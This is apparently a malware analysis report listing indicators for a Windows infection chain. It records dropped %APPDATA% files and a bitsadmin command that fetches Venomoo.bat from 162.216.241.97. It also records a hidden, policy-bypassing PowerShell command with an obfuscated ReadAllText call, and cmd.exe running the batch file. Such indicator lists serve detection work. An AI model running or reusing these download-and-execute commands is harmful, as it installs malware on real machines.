Technical Information
- %APPDATA%\bit3cf0.tmp
- %APPDATA%\jesus.bat.exe
- %APPDATA%\bit3cf0.tmp
- from %APPDATA%\bit3cf0.tmp to %APPDATA%\jesus.bat
- '16#.#16.241.97':80
- http://16#.#16.241.97/Venomoo.bat
- '%APPDATA%\jesus.bat.exe' -noprofile -windowstyle hidden -ep bypass -command $_CASH_kZRlb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('%APPDATA%\jesus.bat').Split([Environment]::NewLine);foreach ($_CASH_qvLkP ...
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 http://162.216.241.97/Venomoo.bat %APPDATA%\jesus.bat (with hidden window)
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 http://162.216.241.97/Venomoo.bat %APPDATA%\jesus.bat
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\jesus.bat" "